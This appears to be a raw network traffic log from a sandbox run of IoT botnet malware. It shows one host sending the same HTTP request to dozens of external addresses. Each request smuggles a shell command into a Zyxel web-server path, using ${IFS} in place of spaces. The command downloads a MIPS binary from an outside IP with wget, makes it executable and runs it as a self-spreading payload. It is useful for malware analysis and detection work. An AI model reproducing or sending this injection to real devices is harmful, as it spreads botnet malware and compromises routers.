                                                Jan 12, 2024 18:24:42.011157036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5860192.168.2.133575853.40.105.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011285067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5861192.168.2.1336698170.177.164.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011341095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5862192.168.2.1337438111.95.140.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011426926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5863192.168.2.1347062223.230.253.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011527061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5864192.168.2.1333454152.177.13.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011593103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5865192.168.2.1353266149.164.193.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011663914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5866192.168.2.1358004168.49.47.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011742115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5867192.168.2.1335438217.28.209.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011825085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5868192.168.2.135101617.250.68.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011879921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5869192.168.2.133922474.87.55.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.011960030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5870192.168.2.135509014.171.229.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012032032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5871192.168.2.1339274200.90.168.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012094975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5872192.168.2.1333738203.106.209.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012173891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5873192.168.2.1349162193.18.226.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012283087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5874192.168.2.1352918218.181.173.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012331963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5875192.168.2.134496249.117.26.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012423038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5876192.168.2.134683696.209.87.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012509108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5877192.168.2.133425042.213.224.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012586117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5878192.168.2.1351936196.246.134.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012656927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5879192.168.2.135863217.168.184.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012765884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5880192.168.2.134481498.87.164.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012850046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5881192.168.2.134255489.149.1.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012924910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5882192.168.2.133925664.70.19.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.012979984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5883192.168.2.1344266204.126.192.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013063908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5884192.168.2.1353182192.232.150.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013128042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5885192.168.2.1351544179.184.139.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013183117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5886192.168.2.1349358169.251.20.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013273954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5887192.168.2.13361045.2.137.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013341904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5888192.168.2.1338542185.242.132.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013420105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5889192.168.2.135230485.255.155.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013474941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5890192.168.2.133670458.143.159.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013535023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5891192.168.2.1344998205.225.169.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013632059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5892192.168.2.1335976139.34.60.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013722897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5893192.168.2.134790672.54.91.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013803959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5894192.168.2.1356564130.196.49.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013858080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5895192.168.2.1346714205.121.45.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013922930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5896192.168.2.1350164163.51.219.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.013979912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5897192.168.2.1347568111.34.229.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014025927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5898192.168.2.133989696.103.48.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014091015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5899192.168.2.1334748188.134.86.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014168978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5900192.168.2.1360212219.132.52.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014286041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5901192.168.2.135257270.34.94.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014322996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5902192.168.2.134413072.12.24.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014430046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5903192.168.2.1337490118.164.229.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014475107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5904192.168.2.134794884.68.9.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014538050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5905192.168.2.1351934183.224.246.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014615059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5906192.168.2.1335574173.95.49.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014703035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5907192.168.2.1340432160.223.95.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014775038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5908192.168.2.134909486.12.40.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014837980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5909192.168.2.1338986217.23.8.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014887094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5910192.168.2.1341650121.113.36.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014935017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5911192.168.2.135252644.139.145.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.014982939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5912192.168.2.1348150223.186.89.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015034914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5913192.168.2.1349870170.39.6.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015126944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5914192.168.2.1349218144.226.19.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015191078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5915192.168.2.1338248206.206.3.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015271902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5916192.168.2.1350384138.44.38.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015321016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5917192.168.2.134487419.241.53.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015419960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5918192.168.2.135374827.8.219.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015491962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5919192.168.2.1353806130.50.2.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015568018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5920192.168.2.1334246211.195.210.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015686035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5921192.168.2.134310259.105.171.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015734911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5922192.168.2.1343432221.147.166.197443
                                                TimestampBytes transferredDirectionData
